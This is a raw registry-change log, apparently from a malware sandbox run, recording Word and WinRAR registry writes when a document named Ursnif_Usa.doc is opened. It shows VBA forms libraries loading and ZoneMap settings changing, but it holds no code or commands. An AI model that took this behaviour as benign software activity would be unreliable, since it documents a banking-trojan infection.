WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\ArcColumnWidths
crc
70
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_0
4C000000730100000402000000000000D4D0C800000000000000000000000000000000000000000042010E00000000000000000039000000B402000000000000000000000000000001000000
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_1
4C000000730100000500000000000000D4D0C8000000000000000000000000000000000000000000A4010B000000000000000000160000002A00000000000000000000000000000002000000
2940
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\General\Toolbar\Layout
Band76_2
4C000000730100000400000000000000D4D0C800000000000000000000000000000000000000000058010A000000000000000000160000006400000000000000000000000000000003000000
2904
WINWORD.EXE
delete key
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
(c:
28633A00580B0000010000000000000000000000
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
1324482603
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482686
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
1324482687
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
580B00003A4FD811783DD50100000000
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
cf:
63663A00580B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
)h:
29683A00580B000006000000010000005C000000020000004C0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C006400650073006B0074006F0070005C007500720073006E00690066005F007500730061002E0064006F006300000000000000
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
1324482564
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{832EE45C-7B3A-4C8F-8A99-3D3A2C23C0D0}
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D53D78132ACE80][O00000000]*C:\Users\admin\Desktop\
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D53D78132D3F80][O00000000]*C:\Users\admin\Desktop\Ursnif_Usa.doc
2904
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\EDA9D
EDA9D
04000000580B00002500000043003A005C00550073006500720073005C00610064006D0069006E005C004400650073006B0074006F0070005C005500720073006E00690066005F005500730061002E0064006F0063000E0000005500720073006E00690066005F005500730061002E0064006F0063000000000001000000000000008034C970753DD5019DDA0E009DDA0E0000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{4E30FADD-C7CA-4135-8AE8-656E9297A8F9}\2.0
Microsoft Forms 2.0 Object Library
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{4E30FADD-C7CA-4135-8AE8-656E9297A8F9}\2.0\FLAGS
6
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{4E30FADD-C7CA-4135-8AE8-656E9297A8F9}\2.0\0\win32
C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{4E30FADD-C7CA-4135-8AE8-656E9297A8F9}\2.0\HELPDIR
C:\Users\admin\AppData\Local\Temp\VBE
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLReset
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLReset
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLCheckbox
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLCheckbox
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLOption
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLOption
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLText
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLText
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLHidden
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLHidden
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLPassword
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLPassword
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSelect
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSelect
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLTextArea
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLTextArea
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
LabelControlEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
LabelControlEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
CommandButtonEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
CommandButtonEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
MdcTextEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
MdcTextEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
MdcListEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
MdcListEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
MdcComboEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
MdcComboEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
MdcCheckBoxEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
MdcCheckBoxEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
MdcOptionButtonEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
MdcOptionButtonEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
MdcToggleButtonEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
MdcToggleButtonEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
ScrollbarEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
ScrollbarEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
TabStripEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
TabStripEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
SpinbuttonEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
SpinbuttonEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
ImageEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
ImageEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
WHTMLControlEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
WHTMLControlEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents1
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents1
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents2
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents2
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents3
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents3
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents4
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents4
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents5
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents5
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents6
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents6
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents7
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents7
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents9
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents9
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents10
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents10
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
IPage
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
IPage
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Pages
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Pages
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
IMultiPage
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
IMultiPage
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
MultiPageEvents
2904
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
MultiPageEvents
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482609
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482610
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482609
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482610
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482634
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482635
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482611
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1324482612
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482611
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1324482612
2904
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1324482636
2904
WINWORD.EXE
write
